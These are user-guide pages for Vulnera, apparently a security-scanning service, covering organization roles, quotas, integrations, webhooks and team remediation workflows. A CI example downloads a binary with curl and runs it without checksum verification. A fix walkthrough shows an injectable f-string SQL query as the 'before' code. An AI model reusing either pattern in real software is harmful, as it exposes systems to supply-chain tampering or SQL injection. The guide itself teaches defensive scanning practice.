| Resolve findings | ✅ | ✅ | ✅ | ❌ |
| Mark false positive | ✅ | ✅ | ✅ | ❌ |
| Organization Settings | | | | |
| View settings | ✅ | ✅ | ❌ | ❌ |
| Modify general info | ✅ | ✅ | ❌ | ❌ |
| Manage members | ✅ | ✅ | ❌ | ❌ |
| Manage API keys | ✅ | ✅ | ❌ | ❌ |
| Billing & Subscriptions | | | | |
| View billing | ✅ | ❌ | ❌ | ❌ |
| Manage billing | ✅ | ❌ | ❌ | ❌ |
| Upgrade plan | ✅ | ❌ | ❌ | ❌ |
| Integrations | | | | |
| View integrations | ✅ | ✅ | ❌ | ❌ |
| Configure integrations | ✅ | ✅ | ❌ | ❌ |
| Manage webhooks | ✅ | ✅ | ❌ | ❌ |
| Audit & Compliance | | | | |
| View audit logs | ✅ | ✅ | ❌ | ❌ |
| Export organization data | ✅ | ❌ | ❌ | ❌ |
| Delete organization | ✅ | ❌ | ❌ | ❌ |
When to Use Each Role
- Owner — Organization founders, ultimate decision-makers, billing contact
  - Best for: 1-2 key decision-makers per organization
  - Caution: Rarely needed, keep minimal
- Admin — Team leads, security directors, technical leads
  - Best for: Day-to-day organization management
  - Responsibility: Member provisioning, integration setup
- Member — Developers, security engineers, DevOps engineers
  - Best for: Active security practitioners who scan code
  - Permissions: Run scans, view/resolve findings
- Viewer — Executives, managers, stakeholders (read-only)
  - Best for: Non-technical decision-makers who need visibility
  - Permissions: View scans, findings, reports (no modifications)
Managing Team Members
Inviting Members
Method 1: Dashboard Invitation
- Go to Settings → Members
- Click Invite Member
- Enter email address(es) — comma-separated for bulk invite
- Select role for each member:
- Admin (for team leads)
- Member (for developers)
- Viewer (for stakeholders)
- Click Send Invitations
- Members receive email with join link (valid for 7 days)
Method 2: Share Organization Link
- Go to Settings → Members → Copy Share Link
- Share link with team (anyone with link can request access)
- Requests appear in pending approval queue
- Admin reviews and approves/denies
Accepting an Invitation
Members receive email from invite@vulnera.studio:
- Click Join Organization link
- Sign in to Vulnera account (create if needed)
- Click Accept Invitation
- Redirect to organization dashboard
- Immediately have access to shared quota and scans
Member Status States
| Status | Description | Action |
|---|---|---|
| Invited | Email sent, awaiting acceptance | Can resend invite or cancel |
| Active | Member joined and has access | Can change role or remove |
| Pending Approval | Join request submitted (if approval required) | Admin can approve/deny |
| Inactive | Member inactive >30 days | Can reactivate or remove |
| Removed | Former member, no access | Can reinvite |
Changing Member Roles
- Go to Settings → Members
- Find member in list
- Click member row → Edit
- Change role dropdown
- Click Save — changes take effect immediately
- Member receives notification of role change
Removing Members
- Go to Settings → Members
- Click member → Remove
- Confirm removal
- Member loses all access immediately
- Their scans remain in history (read-only for audit purposes)
Note: Removed members can be reinvited later.
Viewing Member Activity
Member Details Page:
- Go to Settings → Members
- Click member name
- View:
- Email address, role, join date
- Last active timestamp
- Scans created by member
- API keys generated by member
- Activity timeline
Organization Audit Log (Admin only):
- Go to Settings → Audit Log
- Filter by member:
- Action type (invited, removed, scan created, etc.)
- Member email
- Date range
- Export as CSV for compliance
Shared Quota Management
Understanding Organization Quotas
When members scan within an organization, tokens are consumed from the shared organization quota, not individual quotas.
Example:
- Organization quota: 1000 tokens/month (Pro plan)
- Member A creates scan: uses 10 tokens from shared pool
- Member B creates scan: uses 15 tokens from shared pool
- Remaining: 975 tokens available to all members
Quota Allocation Strategies
Strategy 1: Fully Shared (Default)
- All members share single quota pool
- Transparent: Anyone can see total usage
- Best for: Small, collaborative teams
Strategy 2: Department Quotas (Enterprise)
- Divide quota by team (e.g., 400 tokens/Backend team, 300/Frontend)
- Managed via API or contact sales
- Best for: Large organizations with multiple teams
Strategy 3: Per-Member Budgets (Enterprise)
- Set individual limits per member (e.g., 50 tokens/developer)
- Prevents single member from exhausting quota
- Best for: Organizations with varied usage patterns
Monitoring Quota Usage
Organization Dashboard:
- Go to Organization → Analytics → Dashboard
- View:
- Total tokens used this month
- Tokens remaining
- Usage trend graph (last 6 months)
- Per-member breakdown table
Usage Breakdown:
Total: 850 / 1000 tokens used (85%)
By Module:
├── Dependency Analysis: 450 tokens (53%)
├── SAST: 300 tokens (35%)
├── Secrets: 75 tokens (9%)
└── API Security: 25 tokens (3%)
By Member:
├── alice@acme.com: 400 tokens (47%)
├── bob@acme.com: 300 tokens (35%)
└── charlie@acme.com: 150 tokens (18%)
Setting Quota Alerts
Configure notifications when quota usage reaches thresholds:
- Go to Settings → Notifications → Quota Alerts
- Enable alerts at:
- 50% usage
- 75% usage
- 90% usage
- 100% (exhausted)
- Choose notification method:
- Email (sent to organization contact)
- Slack (if integrated)
- In-app notification
- Save
Upgrading Quota
Option 1: Upgrade Plan
- Free → Pro: +952 tokens (1000 total)
- Pro → Enterprise: Custom allocation
- Go to Settings → Billing → Upgrade Plan
Option 2: Temporary Quota Boost (Enterprise)
- Purchase additional tokens mid-month
- Contact sales@vulnera.studio
- Available for 30 days; expires if unused
Organization Settings
General Settings
Organization Profile:
- Organization name
- Description
- Logo (upload new or remove)
- Contact email
- Website URL (optional)
Edit: Settings → General → Edit Profile
Security Settings
Two-Factor Authentication (for members):
- Require 2FA for all members (optional, Admin sets)
- Go to Settings → Security → Require 2FA
Session Management:
- Session timeout: 30 minutes (default)
- Custom timeout available (Enterprise)
- Go to Settings → Security → Session Policy
IP Whitelisting (Enterprise):
- Restrict access to specific IP ranges
- Useful for VPN-only access
- Go to Settings → Security → IP Whitelist
SSO/SAML (Enterprise):
- Single sign-on via Okta, Azure AD, Google Workspace
- Auto-provisioning of team members
- Go to Settings → Security → SSO Configuration
Data & Privacy
Data Retention Policy:
- Set how long scan results are kept (30 days to 2 years)
- Default: 1 year
- Go to Settings → Data → Retention Policy
Data Export:
- Export all organization data (GDPR compliance)
- Includes scans, findings, member list, audit logs
- Go to Settings → Data → Export Organization Data
Data Deletion:
- Permanently delete organization and all data (irreversible)
- Requires Owner password confirmation
- Go to Settings → Data → Delete Organization
Billing & Subscriptions
View Subscription:
- Go to Settings → Billing → Subscription
- View:
- Current plan (Free/Pro/Enterprise)
- Billing cycle (monthly/annual)
- Next billing date
- Annual savings (if on annual plan)
Update Payment Method:
- Go to Settings → Billing → Payment Method
- Click Edit
- Update card details or select different card
- Click Save
Invoices & History:
- Go to Settings → Billing → Invoices
- View all past invoices (searchable)
- Download as PDF
- Filter by date range
Upgrade/Downgrade Plan:
- Go to Settings → Billing → Change Plan
- Select new plan
- Review pricing impact
- Click Confirm Upgrade/Downgrade
- Changes take effect immediately (or at next cycle)
Integrations & Webhooks
Slack Integration
Setup:
- Go to Settings → Integrations → Slack
- Click Connect Slack Workspace
- Select Vulnera workspace and authorize
- Select notification channel
- Enable notification types:
- Critical findings
- Daily summary
- Weekly report
- Quota alerts
Slack Notifications Example:
🚨 Critical Vulnerability Detected
Repository: acme/backend
Finding: SQL Injection in POST /api/users
Severity: Critical (CVSS 9.2)
Module: SAST
👉 View Details
Disable Slack:
- Go to Settings → Integrations → Slack
- Click Disconnect
GitHub Integration
Setup:
- Go to Settings → Integrations → GitHub
- Click Connect GitHub
- Authorize Vulnera GitHub App
- Select repositories to scan
- Configure auto-scan triggers:
- On push to main/develop
- On all pull requests
- Scheduled daily
GitHub Features:
- PR comments with findings
- Status checks (block merge if critical)
- SARIF upload to code scanning
- Auto-create issues for high-severity findings
Manage Repositories:
- Add new repos: Settings → Integrations → GitHub → Add Repository
- Remove repos: Settings → Integrations → GitHub → Remove (⋯)
GitLab Integration
Setup (via CI/CD):
In .gitlab-ci.yml:
vulnera-scan:
  image: vulnera:latest
  script:
    - vulnera auth login --api-key $VULNERA_API_KEY
    - vulnera analyze . --all-modules --format sarif > vulnera.sarif
  artifacts:
    reports:
      sast: vulnera.sarif
    paths:
      - vulnera.sarif
  allow_failure: true
Webhooks
Create Webhook:
- Go to Settings → Webhooks → Add Webhook
- Enter webhook URL (must be HTTPS)
- Select events:
- scan.started — Analysis job started
- scan.completed — Analysis finished
- finding.created — New vulnerability detected
- finding.resolved — Manually marked resolved
- (Optional) Set webhook secret for signature verification
- Click Create
Test Webhook:
- Go to Settings → Webhooks
- Find webhook in list
- Click Test → sends sample payload to URL
- View response status and body
Webhook Payload:
{
"event": "scan.completed",
"scan_id": "scan-abc123def456",
"organization_id": "org-xyz789",
"project": {
"name": "acme/backend",
"source": "github",
"url": "https://github.com/acme/backend"
},
"analysis_results": {
"total_findings": 12,
"critical": 2,
"high": 5,
"medium": 4,
"low": 1
},
"modules_run": [
"dependencies",
"sast",
"secrets"
],
"timestamp": "2024-01-15T14:30:00Z",
"duration_seconds": 245
}
Webhook Security:
- Always use HTTPS
- Verify webhook signature on your server
- Signature header: X-Vulnera-Signature: sha256=<hash>
- Implement timeout/retry logic
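The signature check takes only a few lines on the receiving server. A minimal sketch, assuming the signature is an HMAC-SHA256 of the raw request body keyed with your webhook secret (the header format comes from above; the exact HMAC scheme is an assumption — confirm it against your webhook settings):

```python
import hashlib
import hmac

def verify_signature(secret: str, body: bytes, header_value: str) -> bool:
    """Compare the X-Vulnera-Signature header against a locally computed HMAC."""
    expected = "sha256=" + hmac.new(secret.encode(), body, hashlib.sha256).hexdigest()
    # compare_digest avoids leaking timing information to an attacker
    return hmac.compare_digest(expected, header_value)

# Example: a payload signed with the correct secret passes, others fail
body = b'{"event": "scan.completed"}'
sig = "sha256=" + hmac.new(b"my-secret", body, hashlib.sha256).hexdigest()
assert verify_signature("my-secret", body, sig)
assert not verify_signature("wrong-secret", body, sig)
```

Always verify against the raw bytes of the request body, before any JSON parsing or re-serialization.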
Audit & Compliance
Audit Log
Organization admins can view all member actions and configuration changes.
Access Audit Log:
- Go to Settings → Audit Log
- View entries (newest first):
- Timestamp
- Member email
- Action (invited, scan created, key generated, etc.)
- Resource affected
- IP address
Filter Audit Log:
- By action type (Member activity, Configuration, Scan, Integration)
- By member email
- By date range
- By resource (scan ID, API key ID, etc.)
Export Audit Log:
- Go to Settings → Audit Log → Export
- Select date range
- Choose format: CSV or JSON
- Download file
Audit Log Retention:
- Free plan: 30 days
- Pro: 90 days
- Enterprise: 2 years (configurable)
Compliance Reports
Generate Compliance Report:
- Go to Reports → Compliance Reports
- Select framework:
- SOC2 Type II
- ISO 27001
- GDPR
- HIPAA (Enterprise)
- PCI DSS (Enterprise)
- Select date range
- Click Generate
- Download as PDF
Report Contents:
- Organization access controls summary
- Member provisioning/deprovisioning records
- Security incident history
- Data handling practices
- Audit log excerpts
Best Practices
Organization Structure
Small Teams (1-10 members):
- 1 Owner
- 1-2 Admins
- Rest as Members/Viewers
- Shared quota sufficient
Medium Teams (10-50 members):
- 1 Owner
- 3-5 Admins (by department/team)
- Members/Viewers as needed
- Consider department quotas (Enterprise)
Large Organizations (50+ members):
- 1 Owner
- 10+ Admins (by team/geography)
- Hierarchical teams (Enterprise)
- Custom RBAC roles (Enterprise)
- SSO/SAML mandatory
Member Lifecycle
Onboarding:
- Invite new member with appropriate role
- Have member review organization settings
- Add to Slack channel notifications
- Provide API key for CLI (if Member/Admin)
- Confirm first scan works
Offboarding:
- Remove member from organization
- Revoke API keys (if any)
- Review scans they created (for audit)
- Export member’s contributions (if needed)
- Archive related configurations
Security Practices
✅ Do:
- Assign minimal required role (principle of least privilege)
- Use Viewers for non-technical stakeholders
- Rotate API keys every 90 days
- Enable 2FA for all members (if available)
- Audit member list quarterly
- Review audit logs monthly
- Enable webhook signature verification
❌ Don’t:
- Share API keys between members
- Grant Owner role to multiple people
- Use generic/shared email addresses
- Disable audit logging
- Leave unused integrations connected
- Ignore quota warnings
Troubleshooting
Q: Member invited but never received email
A: 1. Check their spam folder
2. Resend invite: Settings → Members → Resend
3. Verify email address spelling
4. Check if email is already registered (member may self-join)
Q: Member can’t see organization scans
A: 1. Verify member role is not Viewer
2. Confirm member accepted invitation
3. Member should log out and log back in
4. Clear browser cache
5. Check audit log for removal records
Q: API key not working for organization scans
A: 1. Verify key belongs to org admin/member
2. Check key hasn't expired (Settings → API Keys)
3. Confirm key has org scope (not just personal)
4. Regenerate if needed
5. Verify member role allows scan creation
Q: Quota exhausted early
A: 1. Review usage (Analytics → Dashboard)
2. Check for duplicate scans
3. Optimize scan targets (exclude node_modules, etc.)
4. Upgrade plan (Settings → Billing)
5. Contact sales for temporary boost (Enterprise)
Q: How to transfer organization ownership
A: 1. Owner adds desired new owner as Admin
2. New owner transfers via Settings → Transfer Ownership
3. Current owner confirms transfer
4. Former owner demoted to Admin automatically
Next Steps
- Set Up Integrations — Connect Slack, GitHub for automated workflows
- Configure Webhooks — Feed findings to your ticketing system
- Generate Your First Report — Create compliance or executive summary report
- Audit Organization — Review member list and access quarterly
For team collaboration workflows, see Team Collaboration Guide. For dashboard features, see Dashboard Guide.
Need help? Email support@vulnera.studio or visit our FAQ.
Team Collaboration Guide
Vulnera enables seamless collaboration across security teams, DevOps, and developers. This guide covers workflows for shared vulnerability analysis, coordinated remediation, and team-based security practices.
Collaboration Workflows
Shared Analysis Setup
Scenario: Security team wants developers to run scans and review findings together
- Create Organization
- Go to Dashboard → + New Organization
- Name: “Engineering Security”
- Add organization description
- Invite Team Members
- Go to Settings → Members → Invite Member
- Invite developers with Member role (can create scans, resolve findings)
- Invite security lead with Admin role (manage integrations, settings)
- Invite executives with Viewer role (read-only access to reports)
- Set Up Shared Quota
- Organization gets shared token pool (e.g., 1000 tokens/month for Pro)
- All members draw from same pool
- No individual limits unless configured (Enterprise)
- Enable Notifications
- Settings → Integrations → Slack
- Connect team Slack workspace
- Enable daily summary and critical finding alerts
- All members get notifications in shared channel
Scan Coordination
Multi-stage scanning workflow:
Developer creates scan
↓
Scan runs (uses shared quota)
↓
Results available to all members
↓
Security team reviews findings
↓
Developer addresses findings
↓
Findings marked resolved
↓
Historical record kept for audit
Practical Example:
- Developer Alice runs a scan on /backend:
vulnera auth login --api-key $ORG_API_KEY   # org key, not personal
vulnera analyze ./backend --all-modules
- Security lead Bob reviews findings in dashboard:
- Open scan → Filter by Critical/High severity
- Add comments to findings
- Mark false positives
- Create Jira tickets for issues
- Developer Alice gets Slack notification:
- “New critical finding in backend scan”
- She clicks link → opens dashboard
- Sees Bob’s comments and tickets
- Fixes code locally
- Alice re-runs scan after fix:
- Same findings now show as “Resolved”
- Historical comparison shows before/after
Code Review Integration
GitHub PR workflow with Vulnera:
- Set up GitHub Integration (Admin):
- Settings → Integrations → GitHub
- Authorize Vulnera app
- Enable “Auto-scan PRs”
- Developer opens PR:
- GitHub automatically triggers Vulnera scan
- Results appear as PR status check
- Security review:
- PR blocked if critical issues found
- Vulnera comment on PR with findings
- Link to full dashboard for details
- Developer can request security review
- Resolution:
- Developer pushes fix commit
- Vulnera automatically re-scans
- If clean, PR check passes
- Can now merge to main
Example GitHub PR Comment:
🚨 Vulnera Security Scan Found Issues
Critical (1):
- SQL Injection in /src/api/users.py:45
CVSS: 9.2
High (2):
- Hardcoded API key in config.py:12
- Missing input validation in POST /api/data:78
View full report: [Dashboard Link]
Bot action: This PR is blocked until issues are resolved
Finding Management
Assigning Findings
Assign to Team Member:
- Open scan → select finding
- Click Assign To
- Search member by email or name
- Member gets notification:
- Email: “You’ve been assigned a critical finding”
- Slack: Link to finding with severity
- In-app: Shows in “Assigned to Me” queue
My Assignments View:
- Dashboard → My Assignments
- Shows all findings assigned to current member
- Sort by severity, due date, project
- Quick filter: Unstarted, In Progress, Blocked
Tracking Remediation
Finding Status Lifecycle:
Open (New)
↓
In Progress (assigned, work started)
↓
Resolved (fix implemented, verified)
OR
False Positive (not a real issue)
OR
Acknowledged (known issue, accepting risk)
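The lifecycle above is a small state machine. A hypothetical sketch of the allowed moves — the docs do not say whether terminal states can be reopened, so they are assumed final here:

```python
# Allowed status transitions for a finding.
# Assumption: Resolved / False Positive / Acknowledged are terminal.
ALLOWED_TRANSITIONS = {
    "Open": {"In Progress", "Resolved", "False Positive", "Acknowledged"},
    "In Progress": {"Resolved", "False Positive", "Acknowledged"},
    "Resolved": set(),
    "False Positive": set(),
    "Acknowledged": set(),
}

def can_transition(current: str, new: str) -> bool:
    """True if a finding may move from `current` status to `new`."""
    return new in ALLOWED_TRANSITIONS.get(current, set())

assert can_transition("Open", "In Progress")
assert can_transition("In Progress", "Resolved")
assert not can_transition("Resolved", "Open")
```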
Updating Status:
- Open finding → Status dropdown
- Select new status
- Add comment (optional):
- Explain why marked false positive
- Link to fix PR or commit
- Document risk acceptance
- Members with access see update:
- Slack notification: “@alice marked as Resolved”
- Audit log records change
- Dashboard updates in real-time
Commenting & Discussion
Collaborate on Finding:
- Open finding → scroll to Discussion section
- Click Add Comment
- Type message (Markdown supported)
- @mention team members: @bob or @security-team
- Submit → all mentioned members notified
Example Finding Discussion:
Alice: "This is a security issue in our OAuth implementation"
Bob: "Good catch. I'll check if this affects production"
Charlie: "@bob let's verify in staging first"
Security Lead: "Approved for resolution. PR: #4521"
Threaded Discussions (Enterprise):
- Reply to specific comments
- Resolve/pin important threads
- Export discussion for compliance
Reporting & Analytics
Team Analytics Dashboard
Organization Analytics (Admin view):
Go to Settings → Analytics → Dashboard
View:
- Team quota usage (bar chart: 850/1000 tokens used)
- Usage by member (table: Alice 400 tokens, Bob 300, etc.)
- Usage by module (pie: Dependencies 50%, SAST 35%, Secrets 15%)
- Trend (line graph: last 6 months)
- Busiest project, most findings by type
Shared Reports
Generate Report for Stakeholders:
- Go to Reports → New Report
- Select report type:
- Executive Summary — High-level metrics for leadership
- Detailed Technical — Full findings for security team
- Compliance — SOC2/ISO27001/GDPR aligned
- Department Summary — Findings by team/project
- Configure:
- Date range (last 30 days, last quarter, custom)
- Modules to include (dependencies, SAST, secrets, API)
- Recipients (email, download, or both)
- Click Generate
- Share PDF/HTML with stakeholders
Executive Summary Example:
VULNERA SECURITY REPORT
January 2024
OVERVIEW
Total Vulnerabilities: 247
Critical: 12 | High: 45 | Medium: 120 | Low: 70
TRENDS
↓ 15% fewer critical issues vs. last month
→ Secrets detection improved (5 leaked credentials caught)
↑ Dependencies increased (new packages added)
TEAM PERFORMANCE
Alice: 42 scans, 340 findings reviewed
Bob: 38 scans, 280 findings reviewed
Charlie: 25 scans, 180 findings reviewed
NEXT STEPS
1. Remediate 5 critical issues (ongoing)
2. Update 12 outdated dependencies (in progress)
3. Add 2 new team members for code review capacity
Custom Dashboards (Enterprise)
Create personalized views:
- Go to Organization → Dashboards → Custom
- Select widgets:
- Recent findings
- Team quota gauge
- Trend chart
- Member activity
- CI/CD integration status
- Arrange layout, save as team dashboard
- Share with team members
Security Team Workflows
Daily Security Review Routine
Morning (15 min):
- Check Slack for critical findings overnight
- Review My Assignments dashboard
- Prioritize by severity and project criticality
Mid-day (30 min):
- Comment on findings with remediation guidance
- Assign new findings to developers
- Update status on resolved items
End-of-day (10 min):
- Generate daily summary report
- Check team quota usage (alert if >75%)
- Review newly integrated repositories
Weekly (1 hour):
- All-hands meeting: review weekly findings summary
- Discuss high-priority remediation blockers
- Plan integrations/automation improvements
Escalation Process
When to escalate finding:
- Critical + No Owner Assigned → Assign to team lead immediately
- Finding unresolved 7+ days → Escalate to manager
- Multiple critical findings in same code → Schedule code review session
- Suspicious pattern (e.g., many secrets) → Notify CISO
Escalation in Dashboard:
- Open finding → Mark Escalated
- Add reason:
- High business impact
- Unresponsive team
- Need architecture review
- Escalated findings show in red on analytics
- Leadership dashboard shows escalations count
Developer Workflows
Running Scans as Developer
Individual Contributor:
# Authenticate with org API key
vulnera auth login --api-key $ORG_API_KEY
# Scan your code (uses org quota, not personal)
vulnera analyze ./src --all-modules --format json
# View results (or use dashboard)
vulnera analyze ./src --all-modules --format json | jq '.findings[] | {location, message, severity}'
Pre-commit Scanning:
- Install hook:
vulnera install-hook ./
- Hook runs before commit, blocks if critical:
$ git commit
Vulnera scan in progress...
2 critical findings detected. Commit blocked. Fix and retry: git commit
CI/CD Integration:
In .github/workflows/security.yml:
name: Security Scan
on: [push, pull_request]
jobs:
vulnera-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Vulnera scan
env:
VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
run: |
curl -L https://releases.vulnera.studio/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
./vulnera analyze . --all-modules --format sarif > vulnera.sarif
- name: Upload SARIF to GitHub
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: vulnera.sarif
Understanding & Fixing Findings
When you get assigned a finding:
- Notification (Slack, email, dashboard)
- Click link → opens finding details
- Understand the Issue
- Read vulnerability explanation
- Look at affected code snippet
- Review CVSS score and severity
- Check provided remediation guidance
- Research if Needed
- Follow linked CVE/CWE
- Check if it affects your use case
- Ask security team for context (@bob in dashboard)
- Fix or Dismiss
- If real issue: Create fix branch, implement patch, commit
- If false positive: Mark as such in dashboard with reason
- If acceptable risk: Mark as “Acknowledged” (with manager approval)
- Verify
- Re-run scan locally: vulnera analyze ./
- Finding should disappear or show as resolved
- Create PR with fix
- Vulnera auto-scans PR → shows as clean
- Mark Complete
- PR merged → Vulnera marks finding resolved
- Or manually: Dashboard → Finding → Status → Resolved
Example Finding Workflow:
Finding: SQL Injection in /api/users.py:45
Severity: Critical
CVSS: 9.2
Developer reads:
"User input is concatenated directly into SQL query without parameterization"
Developer fixes:
# Before
query = f"SELECT * FROM users WHERE id = {user_id}"
# After
query = "SELECT * FROM users WHERE id = $1"
db.execute(query, [user_id])
Developer re-scans → Finding gone → PR merged
Dashboard shows: “Resolved by commit abc123def”
Cross-Team Collaboration
Developer + Security Team
Weekly Sync Meeting:
- Agenda (30 min):
- Review critical findings from past week
- Discuss blockers (unclear requirements, false positives)
- Prioritize next week's work
- Demo fixes and improvements
- Before Meeting:
- Security team prepares findings summary (generated report)
- Developers review assigned items in dashboard
- Both teams note questions
- After Meeting:
- Document decisions in dashboard comments
- Update remediation timeline
- Send summary email to stakeholders
DevOps + Security Team
Infrastructure Scanning:
- DevOps sets up cloud scanning:
vulnera analyze s3://our-bucket --all-modules
vulnera analyze github-repos --org acme-corp --all-modules
- Security reviews infrastructure findings:
- Cloud misconfigurations
- Exposed credentials in configs
- Vulnerable dependencies in infra code
- DevOps fixes issues:
- Updates IaC templates (Terraform, CloudFormation)
- Re-scans to verify
- Dashboards show infrastructure security posture
Security Team + Leadership
Monthly Executive Report:
- Generate Compliance Report:
- Go to Reports → Compliance Reports → SOC2
- Select past month
- Download PDF
- Include in Board Deck:
- Overview of findings trend
- Team remediation velocity
- Risk metrics and KPIs
- Budget/quota efficiency
- Dashboard Access for Leadership:
- Create Viewer accounts for executives
- Give read-only access to reports
- They can view trends without modifying findings
Notifications & Alerts
Configuring Team Notifications
Central Configuration (Admin):
- Go to Settings → Notifications
- Set for entire team:
- Critical findings: Immediate Slack alert
- High findings: Daily digest email
- Quota alerts: At 75%, 90%, 100%
- Member activity: Weekly summary
Personal Preferences (Member):
- Go to Profile → Notification Preferences
- Member can override:
- Frequency (real-time, daily digest, weekly summary)
- Channel (email, Slack, in-app, SMS)
- Finding types (all, critical only, assigned only)
Slack Channel Strategy
Setup Channels:
- #vulnera-critical — Real-time critical findings (mention team lead)
- #vulnera-security — All findings, daily summary (team discussion)
- #vulnera-alerts — Quota warnings, integration issues (ops only)
- #vulnera-ci — PR scan results, CI/CD integration logs (read-only bot)
Slack Automation Example:
@vulnera-bot configure
├── #vulnera-critical: severity >= critical
├── #vulnera-security: summary daily 9 AM
├── #vulnera-alerts: quota > 90%
└── #vulnera-ci: all GitHub PR scans
Performance Metrics
Key Metrics to Track
Team Health:
- Remediation Rate — % of findings fixed within SLA
- Mean Time to Remediation (MTTR) — Days from finding to resolved
- False Positive Rate — % of dismissed as not real issue
- Scan Frequency — Scans per week by team
Security Posture:
- Critical Findings Trend — Month-over-month comparison
- Dependency Age — Average age of dependencies
- Secret Exposures — Count of exposed credentials (should be zero)
- Coverage — % of repositories being scanned
Quota Efficiency:
- Tokens/Finding — Cost per vulnerability found
- Scans/Token — How many scans per token used
- Team Quota Burndown — Days until month-end quota exhausted
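As a concrete illustration, the first two team-health metrics can be computed directly from an exported findings list. The tuple layout below is hypothetical — the real analytics export schema may differ:

```python
from datetime import date

# Hypothetical export: (date_opened, date_resolved or None if still open)
findings = [
    (date(2024, 1, 2), date(2024, 1, 5)),
    (date(2024, 1, 3), date(2024, 1, 20)),
    (date(2024, 1, 10), None),  # still open
]
SLA_DAYS = 14  # example remediation SLA

resolved = [(o, r) for o, r in findings if r is not None]
# Remediation Rate: share of ALL findings fixed within the SLA
remediation_rate = sum((r - o).days <= SLA_DAYS for o, r in resolved) / len(findings)
# MTTR: mean days from finding to resolution, over resolved findings only
mttr = sum((r - o).days for o, r in resolved) / len(resolved)
print(f"Remediation rate: {remediation_rate:.0%}, MTTR: {mttr:.1f} days")
# → Remediation rate: 33%, MTTR: 10.0 days
```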
Monthly Review Template
Run this monthly:
- Export analytics report (Settings → Analytics → Export)
- Calculate metrics above
- Create 1-page summary:
- Headline: metrics vs. last month
- Key wins: critical issues resolved
- Blockers: findings taking too long
- Next month priorities
- Share with team + leadership
Best Practices
Team Organization
✅ Small Team (5 members):
- 1 Security lead (Admin)
- 4 Developers (Members)
- Shared single quota pool
- Daily Slack updates
✅ Medium Team (15 members):
- 1-2 Security leads (Admin)
- 10-12 Developers (Member)
- 2-3 Managers (Viewer)
- Department-specific Slack channels
✅ Large Organization (50+ members):
- Hierarchical teams (Enterprise)
- Custom RBAC roles
- Department quotas
- Cross-team steering committee
Communication Best Practices
✅ Do:
- Comment on findings with context (not just “fix this”)
- Mention developers in Slack for urgent issues
- Have weekly syncs (async updates via dashboard)
- Document decisions in finding comments
- Celebrate resolved critical findings
❌ Don’t:
- Assign findings without explanation
- Ignore escalated issues
- Let findings sit unreviewed >5 days
- Resolve without verification
- Skip audit log reviews
Security Practices
✅ Do:
- Use organization API keys, not personal keys
- Rotate API keys quarterly
- Enable 2FA for all members
- Audit member list monthly
- Export compliance reports quarterly
- Review webhook logs
❌ Don’t:
- Share API keys in chat/email
- Use shared email addresses
- Keep inactive members in org
- Disable audit logging
- Store findings in plaintext
- Ignore unreviewed scans
Common Scenarios
Scenario 1: Onboarding New Developer
- Admin invites developer with Member role
- Developer accepts invite
- DevOps provides org API key
- Developer authenticates: vulnera auth login --api-key $ORG_API_KEY
- Developer runs first scan: vulnera analyze ./
- Security team reviews findings, comments with guidance
- Developer receives Slack notification, fixes issues
- Next scan shows issues resolved
Timeline: 30 minutes total
Scenario 2: Critical Finding in Production Code
- Vulnera detects critical SQL injection in production branch
- Slack alert goes to #vulnera-critical (pings team lead)
- Security lead opens dashboard, verifies severity
- Security lead assigns to Alice (code owner) with comment: “URGENT: Fix before merge”
- Alice gets Slack notification, sees 9.2 CVSS score
- Alice creates hotfix branch, implements parameterized query
- Alice commits fix, GitHub auto-scans PR (Vulnera)
- Dashboard shows finding now marked “Resolved”
- Alice creates PR, security approves, code merged
- Production release includes fix
Timeline: 2-4 hours
Scenario 3: Monthly Compliance Reporting
- Security lead runs report: Reports → Compliance → SOC2 → January
- Report generated: PDF with audit log, member actions, findings summary
- Security lead emails report to CISO, board
- CISO reviews with dashboard (Viewer access)
- Sends to auditor for compliance verification
Timeline: 10 minutes to generate, 1 hour to review
Troubleshooting
Q: Team member not seeing organization scans
A: 1. Verify member accepted invitation (check email)
2. Confirm member role is not Viewer
3. Have member log out/log back in
4. Clear browser cache
5. Check if member was removed (Settings → Audit Log)
Q: Findings not appearing in Slack
A: 1. Verify Slack integration enabled (Settings → Integrations)
2. Check notification triggers configured
3. Verify Vulnera app still has channel permissions
4. Test webhook: Settings → Webhooks → Test
5. Check Slack app hasn't been uninstalled from workspace
Q: Team member assigned findings but didn’t respond
A: 1. Verify notification settings (Settings → Notifications)
2. Member may have disabled email notifications
3. Send direct Slack message if urgent
4. Escalate to manager if blocking
5. Consider reassigning if no response in 3 days
Q: How to handle team member leaving?
A: 1. Remove member (Settings → Members → Remove)
2. Revoke their API keys immediately
3. Reassign their open findings to other members
4. Export their scan history (for audit/compliance)
5. Review audit log for any suspicious activity
Next Steps
- Set Up Slack — Enable real-time alerts for your team
- Create Weekly Sync — Calendar recurring meeting to review findings
- Generate First Report — Monthly compliance or executive summary
- Document Workflows — Create team runbook for common scenarios
For dashboard features, see Dashboard Guide. For organization setup, see Organization Management.
Need help? Email support@vulnera.studio or visit our FAQ.
Configuration Reference
This page documents all configuration options for Vulnera.
Environment Variables
Most configuration is set via environment variables with the VULNERA__ prefix, using double underscores for nesting; a few keys, such as DATABASE_URL and provider API keys, are read without the prefix.
Core Settings
| Variable | Description | Default |
|---|---|---|
DATABASE_URL | PostgreSQL connection string | Required |
VULNERA__AUTH__JWT_SECRET | JWT signing secret (32+ chars) | Required |
VULNERA__SERVER__ADDRESS | Server bind address | 0.0.0.0:3000 |
VULNERA__SERVER__ENABLE_DOCS | Enable Swagger UI | true |
LLM Configuration
Vulnera supports multiple LLM providers for AI-powered features.
Provider Selection
| Variable | Description | Default |
|---|---|---|
VULNERA__LLM__PROVIDER | Active provider: google_ai, openai, azure | google_ai |
VULNERA__LLM__DEFAULT_MODEL | Model name for generation | gemini-2.0-flash |
VULNERA__LLM__TEMPERATURE | Generation temperature (0.0-1.0) | 0.3 |
VULNERA__LLM__MAX_TOKENS | Maximum tokens to generate | 2048 |
VULNERA__LLM__TIMEOUT_SECONDS | Request timeout | 60 |
VULNERA__LLM__ENABLE_STREAMING | Enable streaming responses | true |
Google AI (Gemini)
| Variable | Description |
|---|---|
GOOGLE_AI_KEY | API key from aistudio.google.com |
VULNERA__LLM__GOOGLE_AI__BASE_URL | Custom API endpoint |
Recommended models: gemini-2.0-flash, gemini-1.5-pro
OpenAI
| Variable | Description |
|---|---|
OPENAI_API_KEY | API key from platform.openai.com |
